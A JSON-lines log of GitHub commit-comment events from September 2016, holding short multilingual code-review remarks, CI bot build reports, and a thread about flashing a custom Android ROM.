{"id":"4535219289","type":"CommitCommentEvent","actor":{"login":"jerriep"},"repo":{"name":"auth0/docs"},"payload":{"comment":{"id":18948251,"position":null,"line":null,"path":null,"commit_id":"98773906aa3d883429dc648e8878deac90fcf256","created_at":"2016-09-08T16:39:32Z","updated_at":"2016-09-08T16:39:32Z","body":"@garciparedes That depends on the server-side technology you use. But in general you want to obtain a JWT during authentication, and then pass the JWT to the resource server and have some sort of JWT middleware in place on the resource server to authenticate the JWT\r\n\r\nBest place to start would be the Backend / API quickstarts:\r\nhttps://auth0.com/docs/quickstart/backend\r\n\r\nAlso, any questions you have would be best answered on either our Forums (https://auth0.com/forum/) or even better by reaching out to Support (https://support.auth0.com/)"}},"created_at":"2016-09-08T16:39:32Z"}
{"id":"4535219317","type":"CommitCommentEvent","actor":{"login":"gr2m"},"repo":{"name":"Rookies-RGSOC2016/Riot.js-Learning"},"payload":{"comment":{"id":18948252,"position":8,"line":6,"path":"tags/apps-container.tag","commit_id":"875bea46a3d60d666dfce2b68963b615e48c6b84","created_at":"2016-09-08T16:39:33Z","updated_at":"2016-09-08T16:39:33Z","body":"So in general, if you use `<a>` tags to navigate in the app, they `href` attribute must always start with `#/`. And `#/` is the root path"}},"created_at":"2016-09-08T16:39:33Z"}
{"id":"4535219798","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948255,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T16:39:38Z","updated_at":"2016-09-08T16:39:38Z","body":"Remember do decompress the twrp2.img.zip to twrp2.img first, then chose\n```Images``` when flash with Cleverior TWRP.\n\n2016-09-08 23:37 GMT+07:00 Quang Ngô <ngoquang2708@gmail.com>:\n\n> Any of them.\n>\n> 2016-09-08 23:37 GMT+07:00 PhantomAssassin12 <notifications@github.com>:\n>\n>> I will Flash it using odin or using the TWRP(clevior)?\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/commit/bb12130b3135fc21f31bf639dc595ac6ca1addc6#commitcomment-18948197>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AJOl9nrsdct3XxjMTGL3dbwthhH4LPq2ks5qoDm1gaJpZM4J4Cgx>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-08T16:39:38Z"}
{"id":"4535221796","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18948290,"position":null,"line":null,"path":null,"commit_id":"27695f27f6f11409e1be7d1e86030b45d2e98bf0","created_at":"2016-09-08T16:40:00Z","updated_at":"2016-09-08T16:40:00Z","body":"because : actual template system don't use it. And when an user update a tempate file : the template directory time is updated , not the asset directoy time.\r\n\r\nThen : don't give a broken system to user.\r\n\r\nWhen it's ready in LS core (asset system in config.xml) => mv this directory inside."}},"created_at":"2016-09-08T16:40:00Z"}
{"id":"4535223195","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18948294,"position":null,"line":null,"path":null,"commit_id":"e24399610a78b39aa5c286d251a9bba67d934dda","created_at":"2016-09-08T16:40:17Z","updated_at":"2016-09-08T16:40:17Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ZZoPmxiqT1ChIbhxYE4gfw"}},"created_at":"2016-09-08T16:40:17Z"}
{"id":"4535223606","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18948297,"position":46,"line":73,"path":"templates/base_awesome/config.xml","commit_id":"27695f27f6f11409e1be7d1e86030b45d2e98bf0","created_at":"2016-09-08T16:40:22Z","updated_at":"2016-09-08T16:40:22Z","body":"AAAArgl ... i remove the bad line ...."}},"created_at":"2016-09-08T16:40:22Z"}
{"id":"4535225356","type":"CommitCommentEvent","actor":{"login":"guyhughes"},"repo":{"name":"guyhughes/dots"},"payload":{"comment":{"id":18948307,"position":5,"line":7,"path":"vim/.vimrc","commit_id":"a4b181ea958ad6134f15c5729ce3b1b6bcf69ebd","created_at":"2016-09-08T16:40:39Z","updated_at":"2016-09-08T16:40:39Z","body":"why"}},"created_at":"2016-09-08T16:40:39Z"}
{"id":"4535226964","type":"CommitCommentEvent","actor":{"login":"guyhughes"},"repo":{"name":"guyhughes/dots"},"payload":{"comment":{"id":18948314,"position":26,"line":38,"path":"vim/.vimrc","commit_id":"a4b181ea958ad6134f15c5729ce3b1b6bcf69ebd","created_at":"2016-09-08T16:40:57Z","updated_at":"2016-09-08T16:40:57Z","body":"fail"}},"created_at":"2016-09-08T16:40:57Z"}
{"id":"4535228011","type":"CommitCommentEvent","actor":{"login":"guyhughes"},"repo":{"name":"guyhughes/dots"},"payload":{"comment":{"id":18948316,"position":85,"line":149,"path":"vim/.vimrc","commit_id":"a4b181ea958ad6134f15c5729ce3b1b6bcf69ebd","created_at":"2016-09-08T16:41:09Z","updated_at":"2016-09-08T16:41:09Z","body":"This was moronic\r\n"}},"created_at":"2016-09-08T16:41:09Z"}
{"id":"4535230504","type":"CommitCommentEvent","actor":{"login":"luisyanza"},"repo":{"name":"luisyanza/ERP_SYS"},"payload":{"comment":{"id":18948323,"position":null,"line":null,"path":null,"commit_id":"0794903d0059fd34ad972cce258426b25006a104","created_at":"2016-09-08T16:41:33Z","updated_at":"2016-09-08T16:41:33Z","body":"\nkaty cuando nos volvemos a reunir???\nponga la fecha\n\n________________________________\nDe: katitafranco <notifications@github.com>\nEnviado: miércoles, 07 de septiembre de 2016 14:23\nPara: luisyanza/ERP_SYS\nAsunto: Re: [luisyanza/ERP_SYS] cambios que no se habian agregado (0794903)\n\n\nPor alguna razon no se agregaban esas clases ... ingrese al proyecto por el team explorer y seleccione unsynced commits y salieron todos esos archivos y los agregue con commit.\n\n-\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub<https://github.com/luisyanza/ERP_SYS/commit/0794903d0059fd34ad972cce258426b25006a104#commitcomment-18934189>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AIkuz6dwN2RPbVOs50FSLqvNswgirKh7ks5qnw9FgaJpZM4J3Q8k>.\n"}},"created_at":"2016-09-08T16:41:33Z"}
{"id":"4535231023","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948328,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T16:41:40Z","updated_at":"2016-09-08T16:41:40Z","body":"yeah thanks mate it work ."}},"created_at":"2016-09-08T16:41:40Z"}
{"id":"4535231138","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":18948329,"position":87,"line":87,"path":"src/html/index.html","commit_id":"95425100060c6759fc722fd99fd93ded04bb17aa","created_at":"2016-09-08T16:41:41Z","updated_at":"2016-09-08T16:41:41Z","body":"Du har glömt att stänga dina anchor links <a href=\"#\">LÄNK</a>"}},"created_at":"2016-09-08T16:41:41Z"}
{"id":"4535232061","type":"CommitCommentEvent","actor":{"login":"guyhughes"},"repo":{"name":"guyhughes/dots"},"payload":{"comment":{"id":18948333,"position":276,"line":564,"path":"vim/.vimrc","commit_id":"a4b181ea958ad6134f15c5729ce3b1b6bcf69ebd","created_at":"2016-09-08T16:41:51Z","updated_at":"2016-09-08T16:41:51Z","body":"You should review your garbage code before committing. "}},"created_at":"2016-09-08T16:41:51Z"}
{"id":"4535232882","type":"CommitCommentEvent","actor":{"login":"CaptainPRICE"},"repo":{"name":"wiremod/wire"},"payload":{"comment":{"id":18948339,"position":null,"line":null,"path":null,"commit_id":"e0e74df40ff2797cdbcd14e1dc9113aa7bde436f","created_at":"2016-09-08T16:42:01Z","updated_at":"2016-09-08T16:42:01Z","body":"* bringing this into attention *\r\nDescription text-entry is not read-only. I think this is incorrect behavior and should be made read-only (not editable).\r\n\r\n@Jack37 @Divran @TomyLobo \r\nSee @GanjaFarmer comment."}},"created_at":"2016-09-08T16:42:01Z"}
{"id":"4535233910","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18948346,"position":2,"line":4,"path":"дорога/MyForm.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T16:42:12Z","updated_at":"2016-09-08T16:42:12Z","body":"Не для того, что бы знать, а для того, что бы можно было легко и безболезненно менять код -> хорошее юзабилити"}},"created_at":"2016-09-08T16:42:12Z"}
{"id":"4535236475","type":"CommitCommentEvent","actor":{"login":"MHerszak"},"repo":{"name":"TelescopeJS/Telescope"},"payload":{"comment":{"id":18948359,"position":null,"line":null,"path":null,"commit_id":"cbd9141e78e544c1f61c42c0ea1078d38adf5459","created_at":"2016-09-08T16:42:39Z","updated_at":"2016-09-08T16:42:39Z","body":"Question: how did you get away with removing \"react-addons-pure-render-mixin\"?"}},"created_at":"2016-09-08T16:42:39Z"}
{"id":"4535237391","type":"CommitCommentEvent","actor":{"login":"richlewis42"},"repo":{"name":"richlewis42/scikit-chem"},"payload":{"comment":{"id":18948362,"position":null,"line":null,"path":null,"commit_id":"6ee580eca2672070f77d5c937ad4ff3ed40e7c2b","created_at":"2016-09-08T16:42:49Z","updated_at":"2016-09-08T16:42:49Z","body":"Thanks, and sorry I didn't get back sooner (also for not properly putting this in the issue).\r\n\r\nI wanted TransformFilter to be usable with AtomTransformer too, which is why it only inherits from BaseTransformer (so it's really a mixin).  These classes should therefore inherit from Transformer and TransformFilter.  This was mostly me playing around with multiple inheritance, and is on the list for a proper refactor, or at least proper documentation for the inheritance hierarchy.\r\n\r\nI think as an example it would look something like:\r\n\r\n```python\r\n\r\nfrom skchem.base import Transformer\r\nfrom skchem.filters.base import TransformFilter  # should be moved to skchem.base eventually\r\n\r\n\r\nclass BaseStandardizer(Transformer, TransformFilter):\r\n    \r\n    @abstractmethod\r\n    def _transform_mol(self, mol):\r\n        pass\r\n\r\n    @property\r\n    def columns(self):\r\n        return pd.Index('{}_output'.format(self.__class__.__name__))\r\n\r\n\r\nclass AddExplicitHydrogens(BaseStandardizer):\r\n\r\n    def __init__(self, explicit_only=False, add_coords=False): # give full kwargs, as we use introspection to get the parameters for serialisation of these objects. Also, is self documenting.\r\n        super(AddExplicitHydrogens, self).__init__()\r\n        self.explicit_only = explicit_only\r\n        self.add_coords = add_coords\r\n\r\n    def _transform_mol(self, mol):\r\n        return skchem.Mol.from_super(Chem.AddHs(mol, explicitOnly=self.explicit_only,\r\n                                                addCoords=self.add_coords))\r\n    \r\n```\r\n\r\nThe rest (processing pandas objects, handling parallel, producing loading bars etc.) should be handled by `Transformer`.\r\n        "}},"created_at":"2016-09-08T16:42:49Z"}
{"id":"4535244423","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948376,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T16:44:10Z","updated_at":"2016-09-08T16:44:10Z","body":"```mediacodec``` (new) and ```mediaextractor``` (new) services would crashed without seccomp patches."}},"created_at":"2016-09-08T16:44:10Z"}
{"id":"4535246070","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18948378,"position":null,"line":null,"path":null,"commit_id":"8d0e592e531686dccd172cfee82bd7577859e147","created_at":"2016-09-08T16:44:27Z","updated_at":"2016-09-08T16:44:27Z","body":"FixAgainCentroidForNonConvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.91%25-green.svg)</a>\n"}},"created_at":"2016-09-08T16:44:27Z"}
{"id":"4535250186","type":"CommitCommentEvent","actor":{"login":"MrKuBu"},"repo":{"name":"darkjacky/Garrys-Mod-Alternative-Account-Checker"},"payload":{"comment":{"id":18948403,"position":4,"line":4,"path":"lua/autorun/server/alt_account.lua","commit_id":"c65068e4e87cb10f2ebeb411cc2cd1a5cc187bb1","created_at":"2016-09-08T16:45:12Z","updated_at":"2016-09-08T16:45:12Z","body":"Nice :D"}},"created_at":"2016-09-08T16:45:12Z"}
{"id":"4535251435","type":"CommitCommentEvent","actor":{"login":"dwieeb"},"repo":{"name":"wcatron/ionic-cloud-sdk-php"},"payload":{"comment":{"id":18948418,"position":21,"line":11,"path":"src/Helpers/HttpHandler.php","commit_id":"bad1f90c294146d6893dbb7e8d86553c37f90e13","created_at":"2016-09-08T16:45:24Z","updated_at":"2016-09-08T16:45:24Z","body":"Would it make sense to use `InvalidArgumentException`?"}},"created_at":"2016-09-08T16:45:24Z"}
{"id":"4535257099","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948488,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T16:46:29Z","updated_at":"2016-09-08T16:46:29Z","body":"Remember not to turn the screen off or it will crash :))"}},"created_at":"2016-09-08T16:46:29Z"}
{"id":"4535257518","type":"CommitCommentEvent","actor":{"login":"safaryari"},"repo":{"name":"safaryari/ShoppingCart"},"payload":{"comment":{"id":18948492,"position":null,"line":null,"path":null,"commit_id":"7beca1bdd6e27176f8eb436ce9405b0b0a7aa76d","created_at":"2016-09-08T16:46:34Z","updated_at":"2016-09-08T16:46:34Z","body":"***UICollectionViewDelegeteFlowLayout not Delete. "}},"created_at":"2016-09-08T16:46:34Z"}
{"id":"4535257903","type":"CommitCommentEvent","actor":{"login":"dwieeb"},"repo":{"name":"wcatron/ionic-cloud-sdk-php"},"payload":{"comment":{"id":18948501,"position":23,"line":13,"path":"src/Helpers/HttpHandler.php","commit_id":"bad1f90c294146d6893dbb7e8d86553c37f90e13","created_at":"2016-09-08T16:46:38Z","updated_at":"2016-09-08T16:46:38Z","body":"You are overriding headers instead of adding to them."}},"created_at":"2016-09-08T16:46:38Z"}
{"id":"4535263150","type":"CommitCommentEvent","actor":{"login":"chuparCh0pper"},"repo":{"name":"rocapillon/PoGoIV_xposed"},"payload":{"comment":{"id":18948604,"position":null,"line":null,"path":null,"commit_id":"0220592a236756c033a77b022ea3e8830415eff4","created_at":"2016-09-08T16:47:36Z","updated_at":"2016-09-08T16:47:36Z","body":"Please put this translation into \"res/values-es/strings.xml\""}},"created_at":"2016-09-08T16:47:36Z"}
{"id":"4535265378","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18948650,"position":null,"line":null,"path":null,"commit_id":"e8d6e673cd4cb235488bdb286f77f8879b024a2d","created_at":"2016-09-08T16:48:01Z","updated_at":"2016-09-08T16:48:01Z","body":"also ich habs ausprobiert und ich bekomm keine fehlermeldung \r\nich hab ja auch nichts neues hochgeladen"}},"created_at":"2016-09-08T16:48:01Z"}
{"id":"4535265749","type":"CommitCommentEvent","actor":{"login":"xavcz"},"repo":{"name":"TelescopeJS/Telescope"},"payload":{"comment":{"id":18948652,"position":null,"line":null,"path":null,"commit_id":"cbd9141e78e544c1f61c42c0ea1078d38adf5459","created_at":"2016-09-08T16:48:06Z","updated_at":"2016-09-08T16:48:06Z","body":"Are you sure you run on React 15.3.1?\r\n\r\nI removed it because of the recent React updates: https://facebook.github.io/react/blog/2016/07/13/mixins-considered-harmful.html#solution"}},"created_at":"2016-09-08T16:48:06Z"}
{"id":"4535268581","type":"CommitCommentEvent","actor":{"login":"brycekahle"},"repo":{"name":"spark/buildpack-gcc"},"payload":{"comment":{"id":18948664,"position":1,"line":1,"path":"bin/install-boost","commit_id":"224d4ff0d435f890cd9532f2cc41971f04584964","created_at":"2016-09-08T16:48:35Z","updated_at":"2016-09-08T16:48:35Z","body":"Looks like `1.59.0` is hardcoded here?"}},"created_at":"2016-09-08T16:48:35Z"}
{"id":"4535270490","type":"CommitCommentEvent","actor":{"login":"taphu"},"repo":{"name":"potomak/scotty-format"},"payload":{"comment":{"id":18948680,"position":37,"line":26,"path":"src/Web/Scotty/Format/Trans.hs","commit_id":"49a7f9fd313977ec8cd9d985b6831514a92a6965","created_at":"2016-09-08T16:48:57Z","updated_at":"2016-09-08T16:48:57Z","body":"RFC-2616 states:\r\n\r\n> If no Accept header field is present, then it is assumed that the client accepts all media types.\r\n\r\nThis looks like `406 Not Acceptable` will be returned instead? Usually the easiest way to deal with this is something like:\r\n```haskell\r\nacceptValue <- fromMaybe \"*/*\" <$> header \"Accept\"\r\n```"}},"created_at":"2016-09-08T16:48:57Z"}
{"id":"4535271722","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":18948695,"position":null,"line":null,"path":null,"commit_id":"4bb7f4cbafc5a4b65278e6b1e87bc109d0ba0c64","created_at":"2016-09-08T16:49:13Z","updated_at":"2016-09-08T16:49:13Z","body":"fast-forwarding develop-2.2 to borshop-integration-856-fd-capabilities-cherrypick = 94e6f975"}},"created_at":"2016-09-08T16:49:13Z"}
{"id":"4535273524","type":"CommitCommentEvent","actor":{"login":"mtrabelsi"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18948707,"position":6,"line":89,"path":"application/src/main/java/org/exoplatform/chat/portlet/chat/templates/index.gtmpl","commit_id":"418a8eb7091b664629001affcbfaad38b4b359f8","created_at":"2016-09-08T16:49:32Z","updated_at":"2016-09-08T16:49:32Z","body":"id removed in the next commit"}},"created_at":"2016-09-08T16:49:32Z"}
{"id":"4535277115","type":"CommitCommentEvent","actor":{"login":"dwieeb"},"repo":{"name":"wcatron/ionic-cloud-sdk-php"},"payload":{"comment":{"id":18948721,"position":13,"line":13,"path":"src/API/API.php","commit_id":"bad1f90c294146d6893dbb7e8d86553c37f90e13","created_at":"2016-09-08T16:50:14Z","updated_at":"2016-09-08T16:50:14Z","body":"Don't do file I/O in constructors. The API should take a list of routes as a constructor argument."}},"created_at":"2016-09-08T16:50:14Z"}
{"id":"4535279788","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948732,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T16:50:42Z","updated_at":"2016-09-08T16:50:42Z","body":"the music app dude is crashing."}},"created_at":"2016-09-08T16:50:42Z"}
{"id":"4535280030","type":"CommitCommentEvent","actor":{"login":"albertoleal"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18948735,"position":13,"line":46,"path":"store/cache_driver/cache_driver.go","commit_id":"93840563b825d9fb594184a5489bdc77e3328cb2","created_at":"2016-09-08T16:50:45Z","updated_at":"2016-09-08T16:50:45Z","body":"Just pushed: https://github.com/cloudfoundry/grootfs/commit/0f125b982da9f68233965d3a2bf8cfa937b39423"}},"created_at":"2016-09-08T16:50:45Z"}
{"id":"4535280117","type":"CommitCommentEvent","actor":{"login":"flechoide"},"repo":{"name":"tomato42/tlsfuzzer"},"payload":{"comment":{"id":18948736,"position":null,"line":null,"path":null,"commit_id":"809056a04abe0499c18a320aaa1c528ce1824c2c","created_at":"2016-09-08T16:50:46Z","updated_at":"2016-09-08T16:50:46Z","body":"Hi, seems like there is a syntax error at line number 68 :\r\n+                          fuzz_plaintext(ApplicationDataGenerator(bytearray(b\"GET / HTTP/1.0\\n\\n\"))\r\n+                                       ,\r\n+                                       substitutions={i : 0x31 for i in range(-1, -49, -1)}))"}},"created_at":"2016-09-08T16:50:46Z"}
{"id":"4535280166","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18948737,"position":298,"line":506,"path":"дорога/MyForm.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T16:50:46Z","updated_at":"2016-09-08T16:50:46Z","body":"1, 2, 3, 4, 5... что за магические цифры? \r\nЧеловек, который откроет первый раз программу, не поймет что это за цифры (я тоже не понимаю).\r\nИспользуйте константы. Они помогают делать самодокументируемый код.\r\nПример:\r\nconst int end_of_green_for_human =17; \r\nмб не лучшее название, но все равно придаст большую читабельность коду. И комментариев рукописных дополнительных не требует."}},"created_at":"2016-09-08T16:50:46Z"}
{"id":"4535282132","type":"CommitCommentEvent","actor":{"login":"youknowjack"},"repo":{"name":"indeedeng/codecache-datadog"},"payload":{"comment":{"id":18948744,"position":26,"line":26,"path":"src/main/java/com/indeed/example/CodeCacheDataDog.java","commit_id":"7097f4defed57ff4d9c9771528a8c14dd0508ed7","created_at":"2016-09-08T16:51:10Z","updated_at":"2016-09-08T16:51:10Z","body":"Instead of the while loop, I would suggest making an instantiable class that implements runnable and takes the hostname and port in the constructor and stores the client and mxbean in the constructor. Then the run method can implement the inner part of this while loop, and you can change the main() to instantiate and pass it to a scheduled executor:\r\n`\r\nExecutors.newScheduledThreadPool(1).scheduleAtFixedRate(runnable, 0, 30, TimeUnit.SECONDS);`"}},"created_at":"2016-09-08T16:51:10Z"}
{"id":"4535283342","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18948747,"position":null,"line":null,"path":null,"commit_id":"8d0e592e531686dccd172cfee82bd7577859e147","created_at":"2016-09-08T16:51:22Z","updated_at":"2016-09-08T16:51:22Z","body":"FixAgainCentroidForNonConvex (JasonGlazer) - Win64-Windows-7-VisualStudio-12: OK (2333 of 2334 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8d0e592e531686dccd172cfee82bd7577859e147-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T16:51:22Z"}
{"id":"4535283798","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18948751,"position":null,"line":null,"path":null,"commit_id":"17756adf04e7fe945b03204c8bbd3c89fc6cefdb","created_at":"2016-09-08T16:51:27Z","updated_at":"2016-09-08T16:51:27Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-17756adf04e7fe945b03204c8bbd3c89fc6cefdb-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-17756adf04e7fe945b03204c8bbd3c89fc6cefdb-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T16:51:27Z"}
{"id":"4535289432","type":"CommitCommentEvent","actor":{"login":"kotarot"},"repo":{"name":"kotarot/nl-solver"},"payload":{"comment":{"id":18948762,"position":null,"line":null,"path":null,"commit_id":"feb2cd0043112091697f28618b864878c9a604f3","created_at":"2016-09-08T16:52:33Z","updated_at":"2016-09-08T16:52:33Z","body":"Note: 曲がり角が多いだけで実行はできる。"}},"created_at":"2016-09-08T16:52:33Z"}
{"id":"4535291532","type":"CommitCommentEvent","actor":{"login":"BioRyajenka"},"repo":{"name":"mbuzdalov/ant-eater"},"payload":{"comment":{"id":18948766,"position":26,"line":73,"path":"src/ru/ifmo/ctddev/sushencev/anteater/EncodedField.java","commit_id":"a2a30999f87e76f0a4e809467c8ca69e6dd715f8","created_at":"2016-09-08T16:52:57Z","updated_at":"2016-09-08T16:52:57Z","body":"rots - это изначальная ориентация особей. массивы rots нигде не меняются, поэтому нет смысла их копировать."}},"created_at":"2016-09-08T16:52:57Z"}
{"id":"4535291887","type":"CommitCommentEvent","actor":{"login":"jhendrixMSFT"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18948767,"position":16,"line":16,"path":"run.ps1","commit_id":"948e2e428bea72140fcd0ec7fe075e2a16e6f34e","created_at":"2016-09-08T16:53:01Z","updated_at":"2016-09-08T16:53:01Z","body":"Correct."}},"created_at":"2016-09-08T16:53:01Z"}
{"id":"4535291898","type":"CommitCommentEvent","actor":{"login":"gheber"},"repo":{"name":"HDFGroup/HDF.PInvoke"},"payload":{"comment":{"id":18948768,"position":null,"line":null,"path":null,"commit_id":"080a488e8637da526258fe9b4f4c7aa56a40df33","created_at":"2016-09-08T16:53:01Z","updated_at":"2016-09-08T16:53:01Z","body":"Wow. Excellent write-up. You mean business! :thumbsup:"}},"created_at":"2016-09-08T16:53:01Z"}
{"id":"4535292030","type":"CommitCommentEvent","actor":{"login":"sainavaneethan"},"repo":{"name":"sainavaneethan/django-tables2"},"payload":{"comment":{"id":18948769,"position":null,"line":null,"path":null,"commit_id":"6e3fd23120a76e7ad9fa97b8e759197f03d4420b","created_at":"2016-09-08T16:53:03Z","updated_at":"2016-09-08T16:53:03Z","body":"![ss](https://cloud.githubusercontent.com/assets/3156948/18358461/cb744816-7612-11e6-8611-672581def49a.PNG)\r\n"}},"created_at":"2016-09-08T16:53:03Z"}
{"id":"4535295173","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948779,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-08T16:53:40Z","updated_at":"2016-09-08T16:53:40Z","body":"Yeah, It is much useless for now, the whole ROM. It just give a taste of N.\nAnd that is all.\n\n2016-09-08 23:50 GMT+07:00 PhantomAssassin12 <notifications@github.com>:\n\n> the music app dude is crashing.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/commit/bb12130b3135fc21f31bf639dc595ac6ca1addc6#commitcomment-18948732>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJOl9qxjILWaclx6Q1N2HxOoITFGfITtks5qoDzjgaJpZM4J4Cgx>\n> .\n>\n"}},"created_at":"2016-09-08T16:53:40Z"}
{"id":"4535297410","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18948782,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-08T16:54:06Z","updated_at":"2016-09-08T16:54:06Z","body":"My laptop is free at daytime. You can use it to build your ROM if you can access it over firewall. I do not have access to the router so I cannot help with it."}},"created_at":"2016-09-08T16:54:06Z"}
{"id":"4535299734","type":"CommitCommentEvent","actor":{"login":"tomato42"},"repo":{"name":"tomato42/tlsfuzzer"},"payload":{"comment":{"id":18948784,"position":null,"line":null,"path":null,"commit_id":"809056a04abe0499c18a320aaa1c528ce1824c2c","created_at":"2016-09-08T16:54:30Z","updated_at":"2016-09-08T16:54:30Z","body":"I think the problem is Python 2.6 not understanding array comprehension with dictionaries, but yes, will need to be workarounded"}},"created_at":"2016-09-08T16:54:30Z"}
{"id":"4535301087","type":"CommitCommentEvent","actor":{"login":"tophf"},"repo":{"name":"gorhill/uBO-WebSocket"},"payload":{"comment":{"id":18948786,"position":97,"line":97,"path":"contentscript.js","commit_id":"a4c85f0ae004e332e932b6d6452e3fa75fc6f7f8","created_at":"2016-09-08T16:54:47Z","updated_at":"2016-09-08T16:54:47Z","body":"Makes sense!"}},"created_at":"2016-09-08T16:54:47Z"}
